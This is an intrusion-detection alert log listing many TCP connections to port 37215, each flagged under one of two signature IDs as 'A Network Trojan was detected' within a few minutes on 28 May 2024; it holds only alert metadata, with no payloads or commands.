            SID:2829579
            Source Port:58120
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.927305
            SID:2835222
            Source Port:45926
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.903338
            SID:2835222
            Source Port:60126
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.778995
            SID:2829579
            Source Port:54590
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777385
            SID:2835222
            Source Port:36624
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.319684
            SID:2829579
            Source Port:60644
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.824382
            SID:2835222
            Source Port:53002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.485545
            SID:2829579
            Source Port:40272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.766525
            SID:2835222
            Source Port:38374
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.388297
            SID:2835222
            Source Port:41740
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.852762
            SID:2835222
            Source Port:34674
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.869534
            SID:2829579
            Source Port:37728
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.628632
            SID:2829579
            Source Port:59458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543268
            SID:2829579
            Source Port:54640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.634368
            SID:2835222
            Source Port:44028
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.910195
            SID:2829579
            Source Port:35366
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026891
            SID:2835222
            Source Port:50394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994326
            SID:2829579
            Source Port:56638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.326129
            SID:2829579
            Source Port:59220
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.901552
            SID:2829579
            Source Port:46372
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.423381
            SID:2829579
            Source Port:45230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.065566
            SID:2835222
            Source Port:36844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869956
            SID:2835222
            Source Port:36978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.320715
            SID:2835222
            Source Port:44444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.810582
            SID:2829579
            Source Port:51462
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.706646
            SID:2829579
            Source Port:59326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.922183
            SID:2829579
            Source Port:40990
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.741288
            SID:2835222
            Source Port:57714
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.741920
            SID:2829579
            Source Port:49556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.308272
            SID:2829579
            Source Port:47290
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.920363
            SID:2829579
            Source Port:46926
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.893849
            SID:2835222
            Source Port:47874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.596594
            SID:2829579
            Source Port:50640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.919340
            SID:2835222
            Source Port:35616
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039190
            SID:2835222
            Source Port:49964
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.277489
            SID:2829579
            Source Port:56486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.714587
            SID:2829579
            Source Port:42292
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.968333
            SID:2829579
            Source Port:36874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.453780
            SID:2829579
            Source Port:46506
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.782336
            SID:2835222
            Source Port:51482
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.746145
            SID:2835222
            Source Port:46104
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.753799
            SID:2835222
            Source Port:57666
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:19.875094
            SID:2829579
            Source Port:54950
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.879620
            SID:2835222
            Source Port:49606
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:34.438622
            SID:2829579
            Source Port:58410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.775617
            SID:2835222
            Source Port:55174
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.610451
            SID:2829579
            Source Port:38962
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.911903
            SID:2835222
            Source Port:34938
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.993798
            SID:2835222
            Source Port:57482
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.896848
            SID:2835222
            Source Port:42778
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.275473
            SID:2835222
            Source Port:49196
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.435170
            SID:2835222
            Source Port:58610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.378164
            SID:2829579
            Source Port:34394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.918837
            SID:2835222
            Source Port:43766
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.581829
            SID:2835222
            Source Port:46318
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.893082
            SID:2829579
            Source Port:44204
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.746399
            SID:2829579
            Source Port:58040
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767855
            SID:2835222
            Source Port:53488
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.805295
            SID:2835222
            Source Port:50172
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:19.874993
            SID:2829579
            Source Port:55004
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.000223
            SID:2835222
            Source Port:55460
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.617468
            SID:2835222
            Source Port:55706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.744767
            SID:2829579
            Source Port:53606
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.928291
            SID:2829579
            Source Port:36382
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.623407
            SID:2829579
            Source Port:56284
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809881
            SID:2829579
            Source Port:58122
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:01.873588
            SID:2829579
            Source Port:39932
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.313900
            SID:2829579
            Source Port:56548
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.038431
            SID:2829579
            Source Port:42014
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.275211
            SID:2829579
            Source Port:55022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.335452
            SID:2829579
            Source Port:53506
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.413848
            SID:2829579
            Source Port:58378
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.804001
            SID:2835222
            Source Port:60570
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:16.994697
            SID:2829579
            Source Port:55654
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.079427
            SID:2835222
            Source Port:53234
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.277462
            SID:2829579
            Source Port:49196
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.045873
            SID:2835222
            Source Port:33088
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854631
            SID:2835222
            Source Port:53134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.309389
            SID:2835222
            Source Port:36046
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.350057
            SID:2835222
            Source Port:53460
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869392
            SID:2835222
            Source Port:34940
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.932713
            SID:2829579
            Source Port:42594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.190276
            SID:2835222
            Source Port:50648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.816600
            SID:2835222
            Source Port:37168
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.952749
            SID:2835222
            Source Port:48964
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.857043
            SID:2835222
            Source Port:59572
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.860446
            SID:2835222
            Source Port:36316
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.910936
            SID:2835222
            Source Port:50470
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.275410
            SID:2835222
            Source Port:53970
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869643
            SID:2835222
            Source Port:47954
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.917722
            SID:2835222
            Source Port:49282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.471786
            SID:2829579
            Source Port:59684
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842718
            SID:2829579
            Source Port:48234
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.506791
            SID:2829579
            Source Port:49526
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.808830
            SID:2829579
            Source Port:55934
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.847324
            SID:2835222
            Source Port:58820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.714788
            SID:2829579
            Source Port:34402
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.565453
            SID:2829579
            Source Port:59106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:09.969247
            SID:2829579
            Source Port:38178
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.904124
            SID:2829579
            Source Port:33430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.368880
            SID:2829579
            Source Port:46510
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.834003
            SID:2835222
            Source Port:35144
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.913835
            SID:2835222
            Source Port:46806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.274764
            SID:2835222
            Source Port:58254
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.052254
            SID:2829579
            Source Port:47884
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.299056
            SID:2835222
            Source Port:57056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:44.565815
            SID:2829579
            Source Port:32904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930016
            SID:2829579
            Source Port:60758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.668999
            SID:2835222
            Source Port:39054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.312063
            SID:2835222
            Source Port:52402
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.910118
            SID:2835222
            Source Port:60264
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.335299
            SID:2835222
            Source Port:34156
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.914336
            SID:2835222
            Source Port:36350
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.480949
            SID:2835222
            Source Port:56738
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776269
            SID:2835222
            Source Port:36934
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.491386
            SID:2835222
            Source Port:38678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.470033
            SID:2835222
            Source Port:34908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.871157
            SID:2829579
            Source Port:46166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.350405
            SID:2829579
            Source Port:35458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.542643
            SID:2829579
            Source Port:42776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.861992
            SID:2829579
            Source Port:36306
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.077966
            SID:2829579
            Source Port:58606
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.872613
            SID:2835222
            Source Port:34118
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809232
            SID:2835222
            Source Port:47706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.849701
            SID:2835222
            Source Port:55564
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.037884
            SID:2835222
            Source Port:55776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.922378
            SID:2835222
            Source Port:46060
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.997596
            SID:2835222
            Source Port:59522
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.713299
            SID:2835222
            Source Port:58518
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.883354
            SID:2829579
            Source Port:42880
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.923071
            SID:2829579
            Source Port:53742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.053962
            SID:2835222
            Source Port:33464
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.059065
            SID:2829579
            Source Port:34618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.957018
            SID:2835222
            Source Port:45830
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.943615
            SID:2835222
            Source Port:52970
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.986164
            SID:2835222
            Source Port:38724
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.713468
            SID:2829579
            Source Port:43306
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.356928
            SID:2835222
            Source Port:48988
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.031355
            SID:2835222
            Source Port:54448
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.180696
            SID:2829579
            Source Port:48580
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.020088
            SID:2835222
            Source Port:49508
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.280019
            SID:2835222
            Source Port:38732
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.909891
            SID:2835222
            Source Port:48886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.602795
            SID:2835222
            Source Port:58318
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840871
            SID:2835222
            Source Port:41894
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.895464
            SID:2835222
            Source Port:54654
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.952771
            SID:2829579
            Source Port:56974
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.031370
            SID:2835222
            Source Port:35172
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767158
            SID:2829579
            Source Port:52508
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.552838
            SID:2835222
            Source Port:34976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.704865
            SID:2835222
            Source Port:57320
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.855394
            SID:2829579
            Source Port:56560
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.946718
            SID:2829579
            Source Port:33290
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.878620
            SID:2835222
            Source Port:57340
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.054341
            SID:2835222
            Source Port:45770
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.071264
            SID:2835222
            Source Port:50584
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.059052
            SID:2829579
            Source Port:56738
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.027829
            SID:2835222
            Source Port:52562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.996212
            SID:2829579
            Source Port:37396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.018394
            SID:2829579
            Source Port:52488
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.459522
            SID:2835222
            Source Port:49690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.740484
            SID:2829579
            Source Port:44336
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.506957
            SID:2829579
            Source Port:57650
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.777319
            SID:2835222
            Source Port:54990
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046150
            SID:2829579
            Source Port:51618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.933909
            SID:2835222
            Source Port:40524
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.662197
            SID:2829579
            Source Port:44142
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.004013
            SID:2835222
            Source Port:50466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.738070
            SID:2835222
            Source Port:58168
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.322953
            SID:2829579
            Source Port:55170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.856217
            SID:2835222
            Source Port:48826
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.611986
            SID:2835222
            Source Port:43346
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.319288
            SID:2835222
            Source Port:47284
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.834414
            SID:2835222
            Source Port:47224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.251181
            SID:2829579
            Source Port:42048
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.848431
            SID:2835222
            Source Port:39334
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994041
            SID:2829579
            Source Port:59206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811979
            SID:2835222
            Source Port:40246
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.737314
            SID:2829579
            Source Port:46344
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.904152
            SID:2829579
            Source Port:44260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.260551
            SID:2829579
            Source Port:60868
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.816714
            SID:2829579
            Source Port:60864
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.879969
            SID:2835222
            Source Port:60804
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.931435
            SID:2829579
            Source Port:34522
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777682
            SID:2835222
            Source Port:60334
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.601910
            SID:2835222
            Source Port:37012
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.541429
            SID:2829579
            Source Port:38556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.753176
            SID:2835222
            Source Port:35472
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.582661
            SID:2829579
            Source Port:46170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.180856
            SID:2835222
            Source Port:33886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.923832
            SID:2829579
            Source Port:41178
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.319125
            SID:2835222
            Source Port:50890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.817518
            SID:2835222
            Source Port:53944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842952
            SID:2829579
            Source Port:44244
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.873266
            SID:2835222
            Source Port:59894
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.326655
            SID:2829579
            Source Port:57000
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.760383
            SID:2835222
            Source Port:49306
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.052023
            SID:2835222
            Source Port:53620
            Destination Port:37215
